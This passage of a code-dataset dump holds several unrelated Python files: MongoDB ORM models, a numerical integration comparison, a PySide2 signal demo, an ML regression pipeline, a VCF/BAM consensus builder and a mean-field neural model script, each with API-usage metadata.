"line_number": 35, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "280537700", "text": "# _*_ coding:utf-8 _*_\n\n'''\n定义数据模型\n'''\n\nfrom orm.mongodb.mongobase import (BaseModel, Column)\nfrom orm.mongodb.model_types import (STRING, DATETIME)\n\nfrom utils.tools import HornerHashIds\n\nclass UserModel(BaseModel):\n\n __COLLECTION__ = 'user'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, default='', length=32)\n self.company = Column(STRING, null=False)\n self.email = Column(STRING, length=128)\n self.reg_tm = Column(DATETIME)\n self.reg_ip = Column(STRING, null=False)\n self.pwd = Column(STRING, length=32)\n self.phone = Column(STRING)\n\n\nclass HornerCompany(BaseModel):\n '''\n 使用客服系统的企业用户\n '''\n __COLLECTION__ = 'horner_company'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n self.admin = Column(STRING) # 管理员的编号 horner_worker\n\nclass HornerApplication(BaseModel):\n '''\n the app project belows to one company\n '''\n __COLLECTION__ = 'horner_comp_application'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n\nclass HornerServiceSkill(BaseModel):\n '''\n the service skill of one application, corresponding to customer servicer's group\n '''\n __COLLECTION__ = 'horner_service_skill'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.name = Column(STRING, null=False)\n self.skill_id = Column(STRING) # formed by characters in A-Za-z0-9\n self.desc = Column(STRING)\n self.reg_tm = Column(DATETIME)\n\n def __repr__(self):\n return \"<<< HornerServiceSkill >> name: {0}, skill_id: {1}>\".format(self.name, self.skill_id)\n\nclass HornerWorker(BaseModel):\n '''\n 客服企业的管理员及后台账号\n '''\n __COLLECTION__ = 'horner_worker'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.company_id = Column(STRING)\n self.name = Column(STRING, null=False, length=32)\n self.email = Column(STRING, null=False, length=128)\n self.reg_tm = Column(DATETIME)\n self.reg_ip = Column(STRING, null=False)\n self.pwd = Column(STRING, length=32)\n self.phone = Column(STRING)\n\n def getHornerWaiterId(self):\n '''\n 获取hash后的用户编号\n :return:\n '''\n hh = HornerHashIds()\n return hh.encode(self.id)\n\ndef create_company():\n company = HornerCompany()\n company.name = \"ksg\"\n company.admin = 'caimmy'\n company.desc = 'new seasun'\n r = company.save()\n\n print(r)\n\n\ndef clear_data():\n c = HornerCompany.load_first({'name': 'ksg'})\n c.delete()\n n = HornerWorker().load_first({'name': 'caimmy'})\n n.delete()\n\n print(\"ok\")\n\nif \"__main__\" == __name__:\n sk = HornerServiceSkill()\n sk.name = 'waiter'\n sk.skill_id = '9527'\n sk.desc = 'abcdefghijk'\n\n print(sk)\n\n create_company()\n c = HornerCompany.load_all({'name': 'ksg'})\n print(c)", "sub_path": "models/mongo_store.py", "file_name": "mongo_store.py", "file_ext": "py", "file_size_in_byte": 3188, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 12, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 17, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 19, "usage_type": "argument"}, 
{"api_name": "orm.mongodb.mongobase.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 20, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 21, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 22, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 23, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 24, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 25, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 28, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 35, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 37, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 38, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 39, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 39, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 40, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 42, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 49, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 49, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 51, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 52, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 52, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 53, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 53, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 55, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 62, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 62, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 64, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 64, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 65, "usage_type": "argument"}, 
{"api_name": "orm.mongodb.mongobase.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 66, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 67, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 72, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 79, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 79, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 81, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 81, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 82, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 82, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 83, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 83, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 84, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 84, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 85, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 85, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 86, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 86, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 87, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 87, "usage_type": "argument"}, {"api_name": "utils.tools.HornerHashIds", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "445085940", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef f(y):\n return np.log(y)**2\n\nactual_int = 2*np.log(2)**2 - 4*np.log(2) + 2\n#print actual_int\n\n#N_list = np.arange(10, 1000)\n\n#N_list = [1e1, 1e2, 1e3]\nN_list = [1e1, 1e2, 1e3, 1e4, 1e5, 1e6]\n\nrec_left_err = np.zeros(len(N_list))\nrec_righ_err = np.zeros(len(N_list))\ntrap_err = np.zeros(len(N_list))\n\nfor d, N in enumerate(N_list):\n delta = 1. / N\n x = np.linspace(1, 2, N)\n #print delta, x\n rec_left_areas = np.zeros(len(x))\n rec_righ_areas = np.zeros(len(x))\n trap_areas = np.zeros(len(x))\n\n for c, n in enumerate(x):\n f1 = f(n)\n f2 = f(n+delta)\n\n rec_left = f1 * delta\n rec_left_areas[c] = rec_left\n rec_righ = f2 * delta\n rec_righ_areas[c] = rec_righ\n\n trap = .5*(f1 + f2)*delta\n trap_areas[c] = trap\n\n #print np.sum(rec_areas), np.sum(trap_areas)\n rec_left_err[d] = np.abs( np.sum(rec_left_areas) - actual_int ) / actual_int\n rec_righ_err[d] = np.abs( np.sum(rec_righ_areas) - actual_int ) / actual_int\n trap_err[d] = np.abs( np.sum(trap_areas) - actual_int ) / actual_int\n\n#print actual_int\n\nfig, ax = plt.subplots()\n\nplt.plot(N_list, rec_left_err, label = 'Rectangle Rule (Left)')\nplt.plot(N_list, rec_righ_err, label = 'Rectangle Rule (Right)')\nplt.plot(N_list, trap_err, label = 'Trapezoid Rule')\n\nplt.legend()\n\nplt.grid(linestyle = '--', which = 'both')\n\nplt.xlabel('N', size = 24)\nplt.ylabel(r'$\\epsilon$', rotation = 0, labelpad = 20, size = 24)\n\nplt.xticks(fontsize = 20)\nplt.yticks(fontsize = 20)\n\nplt.legend(prop = {'size': 20})\n\nax.tick_params(labelright = True, labelsize = 20)\n\nax.set_xscale('log')\nax.set_yscale('log')\n\nplt.show()\n", "sub_path": "numerical_integration/compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 1697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.log", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "426863947", "text": "import typing\n\nfrom ..._detail import PolicyCouplerBase\nfrom .._PolicySpec import PolicySpec\n\n\nclass CalcRankAtColumnIndex:\n \"\"\"Functor to provide member function implementation in Policy class.\"\"\"\n\n def __init__(\n self: \"CalcRankAtColumnIndex\",\n policy_spec: typing.Optional[PolicySpec],\n ) -> None:\n pass\n\n def __eq__(self: \"CalcRankAtColumnIndex\", other: typing.Any) -> bool:\n return isinstance(other, self.__class__)\n\n def __call__(\n self: \"CalcRankAtColumnIndex\",\n policy: PolicyCouplerBase,\n index: int,\n num_strata_deposited: int,\n ) -> int:\n \"\"\"After n strata have been deposited, what will the rank of the\n stratum at column index k be?\n\n Enables a HereditaryStratigraphicColumn using this predicate to\n optimize away storage of rank annotations on strata. Takes into the\n account the possibility for in-progress stratum depositions that haven't\n been reflected in num_strata_deposited.\n \"\"\"\n spec = policy.GetSpec()\n\n # upper bound implementation gives the exact number of strata retained\n if index == policy.CalcNumStrataRetainedExact(\n num_strata_deposited,\n ):\n # in-progress deposition case\n return num_strata_deposited\n else:\n return min(\n index * spec.GetFixedResolution(),\n num_strata_deposited - 1,\n )\n", "sub_path": "hstrat/stratum_retention_strategy/stratum_retention_algorithms/fixed_resolution_algo/_scry/_CalcRankAtColumnIndex.py", "file_name": "_CalcRankAtColumnIndex.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Optional", "line_number": 12, "usage_type": "attribute"}, {"api_name": "_PolicySpec.PolicySpec", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 16, "usage_type": "attribute"}, {"api_name": "_detail.PolicyCouplerBase", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "226426626", "text": "#!/usr/bin/python3\n#coding=utf-8\n\nimport sys\nfrom PySide2.QtWidgets import QApplication\nfrom PySide2.QtCore import QObject, Signal, Slot\n\n# 定义一个带有字符串参数的槽\n@Slot(str)\ndef output(str):\n print(str)\n\nclass Test(QObject):\n\t# 自定义一个信号\n output_str = Signal(str)\n\noutput_key = Test()\noutput_key.output_str.connect(output)\n# 发射信号\noutput_key.output_str.emit(\"Signal emit with para\")\n\napp = QApplication(sys.argv)\napp.exec_()\n", "sub_path": "信号槽示例/demo2.py", "file_name": "demo2.py", "file_ext": "py", "file_size_in_byte": 467, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "PySide2.QtCore.Slot", "line_number": 9, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QObject", "line_number": 13, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "11034699", "text": "# __author__ = Chen Meiying\n# -*- coding: utf-8 -*-\n# 2019/3/20 10:40\n\nfrom main_entry.process import train, predict, load_sample_data, evaluate_strategy, build_strategy\nimport matplotlib.pyplot as plt\nfrom main_entry.Para import Para\nfrom sklearn import clone\npara = Para()\nfrom regressors import Ridge_init, RFR_init, SVR_init, DTR_init, ExtraTreeR_init, RFR_init, GBoostR_init\n\nif __name__ == '__main__':\n # 1. 加载train/cv set数据\n X_in_sample, y_in_sample = load_sample_data.load_regress()\n X_train, X_cv, y_train, y_cv, *args = load_sample_data.preprocess(X_in_sample, y_in_sample)\n print(\"X_train shape, y_train shape:\", X_train.shape, y_train.shape)\n print(\"X_cv shape, y_cv shape:\", X_cv.shape,y_cv.shape)\n\n # 2. 初始化模型\n inits = [GBoostR_init.init()]\n\n for init in inits:\n model_name = init[1]\n\n # 3. 训练模型,保存模型\n model = train.train_regress(clone(init[0]), model_name, X_train, X_cv, y_train, y_cv)\n\n # 4. 模型预测,保存预测结果\n n_days_in_test = predict.predict_regress(model, model_name)\n\n # 5. 策略构建\n build_strategy.add_next_day_return(model_name)\n strategy = build_strategy.build(n_days_in_test, model_name)\n\n # 6. 策略评价\n evaluate_strategy.evaluate(strategy, n_days_in_test)\n\n # 其他\n # print(svm.SVC().get_params().keys()) # 查看模型需要的参数\n # model = joblib.load( para.path_results + \"model.m\") # 模型加载", "sub_path": "mlmodels/main_entry/main_r.py", "file_name": "main_r.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "main_entry.Para.Para", "line_number": 9, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data.load_regress", "line_number": 14, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data", "line_number": 14, "usage_type": "name"}, {"api_name": "main_entry.process.load_sample_data.preprocess", "line_number": 15, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data", "line_number": 15, "usage_type": "name"}, {"api_name": "regressors.GBoostR_init.init", "line_number": 20, "usage_type": "call"}, {"api_name": "regressors.GBoostR_init", "line_number": 20, "usage_type": "name"}, {"api_name": "main_entry.process.train.train_regress", "line_number": 26, "usage_type": "call"}, {"api_name": "main_entry.process.train", "line_number": 26, "usage_type": "name"}, {"api_name": "sklearn.clone", "line_number": 26, "usage_type": "call"}, {"api_name": "main_entry.process.predict.predict_regress", "line_number": 29, "usage_type": "call"}, {"api_name": "main_entry.process.predict", "line_number": 29, "usage_type": "name"}, {"api_name": "main_entry.process.build_strategy.add_next_day_return", "line_number": 32, "usage_type": "call"}, {"api_name": "main_entry.process.build_strategy", "line_number": 32, "usage_type": "name"}, {"api_name": "main_entry.process.build_strategy.build", "line_number": 33, "usage_type": "call"}, {"api_name": "main_entry.process.build_strategy", "line_number": 33, "usage_type": "name"}, {"api_name": "main_entry.process.evaluate_strategy.evaluate", "line_number": 36, "usage_type": "call"}, {"api_name": "main_entry.process.evaluate_strategy", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "820557", "text": "#!/usr/bin/env python\nfrom Bio import SeqIO\nimport sys\nimport vcf\nimport subprocess\nfrom collections import defaultdict\nimport os.path\nimport argparse\nimport pathlib\n# This script was modified from the Artic-EBOV repo http://artic.network/ebov/ebov-it-setup.html\n\n\ndef collect_depths(bamfile):\n if not os.path.exists(bamfile):\n raise SystemExit(\"bamfile %s doesn't exist\" % (bamfile,))\n\n p = subprocess.Popen(['samtools', 'depth', bamfile], stdout=subprocess.PIPE)\n out, err = p.communicate()\n depths = defaultdict(dict)\n for ln in out.decode('utf-8').split(\"\\n\"):\n if ln:\n contig, pos, depth = ln.split(\"\\t\")\n depths[contig][int(pos)] = int(depth)\n\n return depths\n\n\ndef report(r, status, allele, vcffile):\n idfile = os.path.basename(vcffile).split(\".\")[0]\n print(\"%s\\t%s\\tstatus\\t%s\" % (idfile, r.POS, status))\n print(\"%s\\t%s\\tdepth\\t%s\" % (idfile, r.POS, r.INFO.get('TotalReads', ['n/a'])))\n print(\"%s\\t%s\\tbasecalledfrac\\t%s\" % (idfile, r.POS, r.INFO.get('BaseCalledFraction', ['n/a'])))\n print(\"%s\\t%s\\tsupportfrac\\t%s\" % (idfile, r.POS, r.INFO.get('SupportFraction', ['n/a'])))\n print(\"%s\\t%s\\tallele\\t%s\" % (idfile, r.POS, allele))\n print(\"%s\\t%s\\tref\\t%s\" % (idfile, r.POS, r.REF))\n\n\ndef main(reference, vcffile, bamfile, sample_name, depth_threshold, quality_threshold):\n masked_positions = []\n bamfile = pathlib.Path(bamfile).absolute()\n reference = pathlib.Path(reference).absolute()\n vcffile = pathlib.Path(vcffile).absolute()\n outfile = pathlib.Path(bamfile.parent, sample_name + \"_consensus_artic.fasta\")\n depths = collect_depths(bamfile)\n seq = list(SeqIO.parse(open(str(reference)), \"fasta\"))[0]\n cons = list(seq.seq)\n\n for n, c in enumerate(cons):\n try:\n depth = depths[seq.id][n+1]\n except KeyError:\n depth = 0\n\n if depth < depth_threshold:\n cons[n] = 'N'\n\n for mask in masked_positions:\n cons[mask-1] = 'N'\n\n sett = set()\n vcf_reader = vcf.Reader(open(str(vcffile), 'r'))\n for record in vcf_reader:\n if record.ALT[0] != '.':\n # variant call\n if record.POS in masked_positions:\n #report(record, \"masked_manual\", \"n\", vcffile)\n continue\n\n # commented out: primers removed with bamclipper\n # if 'PRIMER' in record.INFO:\n # report(record, \"primer_binding_site\", \"n\")\n # cons[record.POS-1] = 'N'\n # continue\n\n # support = float(record.INFO['SupportFraction'])\n total_reads = int(record.INFO['TotalReads'])\n qual = record.QUAL\n ref = record.REF\n alt = str(record.ALT[0])\n\n if qual >= quality_threshold and total_reads >= depth_threshold:\n if len(ref) > len(alt):\n print(f\"gap-masking confident deletion at {record.POS}\")\n for n in range(len(ref)):\n cons[record.POS-1+n] = '-'\n continue\n elif len(alt) > len(ref):\n for i, n in enumerate(alt[::-1]):\n cons.insert(record.POS - 1, n)\n print(f\"adding insertion at position: {record.POS}\")\n continue\n else:\n cons[record.POS - 1] = str(alt)\n print(f\"assigning variant call at {record.POS}\")\n\n #report(record, \"variant\", alt, vcffile)\n sett.add(record.POS)\n\n elif len(ref) > len(alt):\n continue\n else:\n # report(record, \"low_qual_variant\", \"n\", vcffile)\n #cons[record.POS-1] = 'N'\n continue\n\n with open(outfile, 'w') as handle:\n handle.write(f\">{sample_name}\\n{''.join(cons)}\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"make consensus from vcf and bam file\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-r\", 
\"--reference\", type=str, default=argparse.SUPPRESS,\n help=\"The reference genome and primer scheme to use\", required=True)\n parser.add_argument(\"-v\", \"--vcf_file\", type=str, default=argparse.SUPPRESS,\n help=\"The path and name of the vcf file\", required=True)\n parser.add_argument(\"-b\", \"--bam_file\", default=argparse.SUPPRESS, type=str,\n help=\"The path and name of the sorted, trimmed bam file\", required=True)\n parser.add_argument(\"-n\", \"--sample_name\", type=str, default=argparse.SUPPRESS,\n help=\"The sample name\", required=True)\n parser.add_argument(\"-d\", \"--depth_threshold\", type=int, default=10,\n help=\"The minimum coverage allowed to call variants as real\", required=True)\n parser.add_argument(\"-q\", \"--quality_threshold\", type=int, default=10,\n help=\"The minimum Q score to allowed to call variants as real\", required=True)\n\n args = parser.parse_args()\n\n bam_file = args.bam_file\n reference = args.reference\n vcf_file = args.vcf_file\n sample_name = args.sample_name\n depth_threshold = args.depth_threshold\n quality_threshold = args.quality_threshold\n\n main(reference, vcf_file, bam_file, sample_name, depth_threshold, quality_threshold)\n", "sub_path": "src/margin_cons.py", "file_name": "margin_cons.py", "file_ext": "py", "file_size_in_byte": 5436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 17, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 42, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 45, "usage_type": "name"}, {"api_name": "vcf.Reader", "line_number": 61, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 111, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 112, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 113, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "261175323", "text": "#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n\n#### code for the mf of one balanced population with low rank xi: \n\n#### CODE 1a: spontaneous activity in rank-one networks: DMF theory (related to Fig. 1C)\n#### This code computes the DMF solutions (and their stability) for increasing values of the random strength g\n#### The overlap direction is defined along the unitary direction (rho = 0, see Methods)\n#### Within the DMF theory, activity is then described in terms of mean (mu) and variance (delta) of x\n\n#### Note that the Data/ folder is empty to begin; this code needs to be run with the flag doCompute = 1\n#### at least once\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n### Import functions\n\nimport sys\nfrom importlib import reload\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rand\n\nimport fct_integrals as integ\nimport fct_facilities as fac\nimport fct_mf as mf\n\nimport constants as gv\nreload(gv)\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n# We solve separately the DMF equations corresponding to stationary and chaotic states\n\nJ0_list = []\nkappa_list = []\nsigma_0_list = []\nrate_list = []\n\nfor gv.J0 in np.linspace(.001,1.26,200):\n y0 = [rand.random() for i in range(0,2)]\n sol = mf.SolveStaticNonZero(y0)\n\n u = sol[0]\n delta_0 = sol[1]\n \n kappa = mf.overlap(u,delta_0)\n sigma_0 = mf.variance(u,delta_0)\n rate = mf.mean_rate(u, delta_0)\n \n J0_list.append(gv.J0)\n kappa_list.append(kappa) \n sigma_0_list.append(sigma_0)\n rate_list.append(rate)\n\nfor gv.J0 in np.linspace(1.26,1.8,200):\n y0 = [rand.random() for i in range(0,2)]\n sol = mf.SolveStaticZero(y0)\n\n u = sol[0]\n delta_0 = sol[1]\n \n kappa = mf.overlap(u,delta_0)\n sigma_0 = mf.variance(u,delta_0)\n rate = mf.mean_rate(u, delta_0)\n \n J0_list.append(gv.J0)\n kappa_list.append(kappa) \n sigma_0_list.append(sigma_0)\n rate_list.append(rate)\n\nkappas_neg = [-abs(i) for i in kappa_list]\n\nfac.SetPlotParams()\n\nplt.figure('kappa Vs J0')\n# ax0 = plt.axes(frameon=True)\n\nplt.xlabel('$J_0$')\nplt.ylabel('$\\kappa$')\n\nplt.plot(J0_list, kappa_list,'-k')\nplt.plot(J0_list, kappas_neg,'-k')\n\n# ax0.spines['top'].set_visible(False)\n# ax0.spines['right'].set_visible(False)\n# ax0.yaxis.set_ticks_position('left')\n# ax0.xaxis.set_ticks_position('bottom')\n\nplt.savefig('balance_kappaVsJ0.svg',format='svg')\n\nplt.figure('sigma0 Vs J0')\nplt.xlabel('$J_0$')\nplt.ylabel('$\\sigma_0$')\n\nplt.plot(J0_list, sigma_0_list,'-k')\n\nplt.savefig('balance_sigma0VsJ0.svg',format='svg')\n\nplt.figure('r0 Vs J0')\nplt.xlabel('$J_0$')\nplt.ylabel('$r_0$')\n\nplt.plot(J0_list, rate_list,'-k')\nplt.savefig('balance_r0VsJ0.svg',format='svg')\n\n", "sub_path": "python/rate_model/low_rank/balance/main_mf.py", "file_name": "main_mf.py", "file_ext": "py", "file_size_in_byte": 2935, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "importlib.reload", "line_number": 29, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 39, 